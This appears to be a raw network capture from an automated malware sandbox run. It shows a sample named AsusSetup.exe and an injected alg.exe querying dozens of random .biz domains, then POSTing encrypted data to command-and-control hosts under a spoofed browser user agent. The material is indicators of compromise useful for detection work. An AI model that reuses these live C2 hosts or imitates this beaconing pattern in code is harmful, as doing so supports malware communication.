                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.267302036 CET192.168.2.41.1.1.10xcfcbStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.019802094 CET192.168.2.41.1.1.10x5982Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.978578091 CET192.168.2.41.1.1.10xb50bStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.879770994 CET192.168.2.41.1.1.10x188aStandard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.685522079 CET192.168.2.41.1.1.10x52b9Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.693969011 CET192.168.2.41.1.1.10x4473Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.747245073 CET192.168.2.41.1.1.10x4da2Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.718594074 CET192.168.2.41.1.1.10x9672Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.506292105 CET192.168.2.41.1.1.10x3dabStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.062402964 CET192.168.2.41.1.1.10xae0eStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.364620924 CET192.168.2.41.1.1.10xc6a9Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.389167070 CET192.168.2.41.1.1.10x5acaStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.219027042 CET192.168.2.41.1.1.10x5f9Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.540184975 CET192.168.2.41.1.1.10x15c7Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.740787983 CET192.168.2.41.1.1.10x819fStandard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.910320997 CET192.168.2.41.1.1.10xac5Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:17.102371931 CET192.168.2.41.1.1.10x5e01Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:18.785486937 CET192.168.2.41.1.1.10xf5c5Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:20.551800013 CET192.168.2.41.1.1.10xd174Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:22.201894999 CET192.168.2.41.1.1.10xb380Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:23.689502954 CET192.168.2.41.1.1.10xc405Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.475912094 CET192.168.2.41.1.1.10x57e6Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:24.484841108 CET192.168.2.41.1.1.10xefb7Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.775547981 CET192.168.2.41.1.1.10x928dStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.776446104 CET192.168.2.41.1.1.10x6262Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.251075029 CET192.168.2.41.1.1.10x2adStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.811909914 CET192.168.2.41.1.1.10x7b63Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.680924892 CET192.168.2.41.1.1.10xd413Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.565598011 CET192.168.2.41.1.1.10xd1d6Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.014976978 CET192.168.2.41.1.1.10x7388Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.101701975 CET192.168.2.41.1.1.10xb1b4Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.094786882 CET192.168.2.41.1.1.10x47e3Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.805358887 CET192.168.2.41.1.1.10x2c38Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.074923038 CET192.168.2.41.1.1.10xf645Standard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.557455063 CET192.168.2.41.1.1.10xfa26Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.644848108 CET192.168.2.41.1.1.10x1467Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.166555882 CET192.168.2.41.1.1.10x8c62Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.623915911 CET192.168.2.41.1.1.10x22dbStandard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.487735033 CET192.168.2.41.1.1.10x71c7Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.455554008 CET192.168.2.41.1.1.10x7d6dStandard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.315362930 CET192.168.2.41.1.1.10x68ecStandard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.996640921 CET192.168.2.41.1.1.10xc544Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.086139917 CET192.168.2.41.1.1.10x5d1cStandard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.044686079 CET192.168.2.41.1.1.10xaf5fStandard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.910712957 CET192.168.2.41.1.1.10x7563Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.762322903 CET192.168.2.41.1.1.10x91f7Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.443490028 CET192.168.2.41.1.1.10xa6d5Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.248677969 CET192.168.2.41.1.1.10x2708Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.257546902 CET192.168.2.41.1.1.10x1d80Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.685652971 CET192.168.2.41.1.1.10xc625Standard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.370913982 CET192.168.2.41.1.1.10x8565Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.847146034 CET192.168.2.41.1.1.10x47e9Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.109776974 CET1.1.1.1192.168.2.40xb1b4No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.102504015 CET1.1.1.1192.168.2.40x47e3No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.814157963 CET1.1.1.1192.168.2.40x2c38No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.082681894 CET1.1.1.1192.168.2.40xf645No error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.565340996 CET1.1.1.1192.168.2.40xfa26No error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.740974903 CET1.1.1.1192.168.2.40x1467No error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.174402952 CET1.1.1.1192.168.2.40x8c62No error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.632183075 CET1.1.1.1192.168.2.40x22dbNo error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.495934963 CET1.1.1.1192.168.2.40x71c7No error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.464612961 CET1.1.1.1192.168.2.40x7d6dNo error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.323558092 CET1.1.1.1192.168.2.40x68ecNo error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.099559069 CET1.1.1.1192.168.2.40xc544No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:53.197026968 CET1.1.1.1192.168.2.40x5d1cNo error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.054071903 CET1.1.1.1192.168.2.40xaf5fNo error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:54.920118093 CET1.1.1.1192.168.2.40x7563No error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.770437002 CET1.1.1.1192.168.2.40x91f7No error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.542237997 CET1.1.1.1192.168.2.40xa6d5No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.265923977 CET1.1.1.1192.168.2.40x1d80No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.693552017 CET1.1.1.1192.168.2.40xc625No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.378562927 CET1.1.1.1192.168.2.40x8565No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.856312037 CET1.1.1.1192.168.2.40x47e9No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.036345959 CET1.1.1.1192.168.2.40xb52eNo error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.036345959 CET1.1.1.1192.168.2.40xb52eNo error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.438015938 CET1.1.1.1192.168.2.40x169eNo error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.336643934 CET1.1.1.1192.168.2.40x2782No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.043911934 CET1.1.1.1192.168.2.40xb361No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.206911087 CET1.1.1.1192.168.2.40xd9f4No error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.057800055 CET1.1.1.1192.168.2.40x8638No error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.056907892 CET1.1.1.1192.168.2.40x84f3No error (0)cikivjto.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                        • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                        • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                        • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                        • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                        • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                        • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                        • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                        • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                        • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                        • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                        • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                        • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                        • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                        • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                        • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                        • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                        • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                        • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                        • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                        • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                        • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                        • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                        • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                        • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                        • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                        • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                        • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                        • uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                        • fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                        • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                        • rffxu.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 54.244.188.177 | 80 | 6452 | C:\Users\user\Desktop\AsusSetup.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:04.395920038 CET | 353 | OUT | POST /tqhhuuvd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 798
Oct 28, 2024 16:37:04.395936012 CET | 798 | OUT | Data Raw: cd 14 29 1b e0 34 ff 35 12 03 00 00 7e 06 63 24 56 9b d7 58 ed db 25 96 a7 42 01 bf 76 55 3e a7 39 c9 66 86 f7 a3 28 0b 01 cd 0c 9a 5c cf 18 87 68 9c 86 2e 31 94 47 ef 22 28 92 fd c9 19 28 70 7c 8b cf cd 71 79 f7 21 e2 e6 82 87 6c ab 2e 06 ed 91
    Data Ascii: )45~c$VX%BvU>9f(\h.1G"((p|qy!l.]bTl;WE)EGI#(?W/25;Z,5S;}_'EF1JoZKWQf.Cu<=4%qww?$9utI0hps@?9
Oct 28, 2024 16:37:05.225667953 CET | 417 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 28 Oct 2024 15:37:05 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=34ebcb8f7092c4833af3791f46b7a276|155.94.241.188|1730129825|1730129825|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 18.141.10.107 | 80 | 6452 | C:\Users\user\Desktop\AsusSetup.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:05.302685976 CET | 349 | OUT | POST /spoyvi HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 798
Oct 28, 2024 16:37:05.302704096 CET | 798 | OUT | Data Raw: 26 7d 0f 83 dc 27 f4 73 12 03 00 00 1d 6d d1 a2 f4 14 39 9d 8d df 9e a8 ef 9f 2d 63 ac 70 dd 08 8b 3b 1f 65 1e 33 6e b4 b5 16 0e 9f 15 78 9d 87 41 6c 16 44 7d fb a1 46 64 c5 e7 48 bb e5 5a 43 8d 8b 0f 1b d5 5d 78 46 21 4c d2 54 c4 42 0f fc 88 bb
    Data Ascii: &}'sm9-cp;e3nxAlD}FdHZC]xF!LTB4hDwmP?c!xmKP1>|,UmFDcuG_.[G]U0uNm+&0w}&Tf|^-J~PKq$@\h*t_2])-[!
Oct 28, 2024 16:37:06.748608112 CET | 415 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 28 Oct 2024 15:37:06 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=da1fcb88307a930282705adb162218bf|155.94.241.188|1730129826|1730129826|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 54.244.188.177 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:05.363671064 CET | 361 | OUT | POST /fnkotvtiwfwjvbky HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:05.363697052 CET | 778 | OUT | Data Raw: c0 d4 cf 63 8d 13 61 05 fe 02 00 00 43 3a d9 8a 13 84 33 0b db b6 63 08 f2 35 c1 b7 07 ce 39 ef 52 dd 2f 7c 09 0f 14 58 88 6e 48 7f 67 d2 9a e0 21 6c 41 0e 64 df a7 29 6b b6 37 ac 05 e8 92 65 5c bd fc 67 17 7d 60 40 5b c4 de ab 34 ca 02 63 f9 47
Oct 28, 2024 16:37:06.196400881 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3c6cbe0f74c782a8da2a90408d98f3f5|155.94.241.188|1730129826|1730129826|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 18.141.10.107 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:06.271759987 CET | 346 | OUT | POST /aay HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:37:06.272067070 CET | 778 | OUT | Data Raw: 83 e3 be ea 22 70 11 42 fe 02 00 00 3d f9 a5 e3 50 32 bd 82 7c d4 3d c9 2e 3e 27 95 61 b8 13 30 f3 49 79 bb 41 9c ff 6b 46 73 67 20 0e 12 7f 45 fb 9b 45 59 d6 92 f6 1d 2e 2d ad de 41 ce 0d bf 1c ef bf 70 36 7d 5b 55 14 51 21 0e 6e e3 f2 ac e1 74
Oct 28, 2024 16:37:07.732702017 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c8295afbcdf886afd0410df5f0eaafd0|155.94.241.188|1730129827|1730129827|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 54.244.188.177 | 80 | 6452 | C:\Users\user\Desktop\AsusSetup.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:06.816139936 CET | 342 | OUT | POST /y HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 798
Oct 28, 2024 16:37:06.816159964 CET | 798 | OUT | Data Raw: c8 9d d1 51 ea 7c a0 d9 12 03 00 00 b2 0a 14 dd 00 2a 38 ad d5 d6 90 7e f6 d8 95 66 cb 5c 45 58 41 b3 c4 19 ce 79 f9 5e da 14 9e dc 92 84 28 92 be 78 9c 81 f4 cc e1 d0 5e 07 78 3f ea 73 c2 e3 f3 be 37 05 c6 a9 97 78 86 55 d0 b4 1a 46 6e eb 4b dd
Oct 28, 2024 16:37:07.677804947 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c683675103f8ff3a74dbaf3ee487f31e|155.94.241.188|1730129827|1730129827|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49735 | 44.221.84.105 | 80 | 6452 | C:\Users\user\Desktop\AsusSetup.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:37:07.929778099 CET | 353 | OUT | POST /ywrwbyxrs HTTP/1.1
Cache-Control: no-cache
